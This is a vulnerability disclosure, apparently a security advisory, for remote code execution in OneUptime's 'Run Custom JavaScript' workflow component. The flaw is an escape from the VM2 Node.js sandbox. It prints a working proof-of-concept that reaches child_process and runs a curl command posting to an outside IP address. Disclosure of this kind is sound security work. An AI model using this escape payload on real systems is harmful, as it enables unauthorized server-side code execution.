### Summary OneUptime's integration of the VM2 library for its "Run Custom JavaScript" functionality introduces a remote code execution vulnerability via a Node.js sandbox escape, allowing unauthorized execution of server-side code. The vulnerability exists within the "Run Custom JavaScript" component of workflows, which allows the users to run arbitrary JavaScript code. The security flaw is triggered when an attacker designs a workflow incorporating the "Run Custom JavaScript" component, then adds code that can escape the VM2 library's Node.js sandbox. ### PoC <iframe width="560" height="315" src="https://www.youtube.com/embed/w5-Ouhx4F_U?si=OV-9l32QtHCfY66L" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe> Here is the code that was utilized in the sandbox escape: ``` cmd = "curl 192.168.19.133:1337 -d 'pwnd by jakesss'"; async function fn() { (function stack() { new Error().stack; stack(); })(); } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); } ) } } }; return p.then(); ```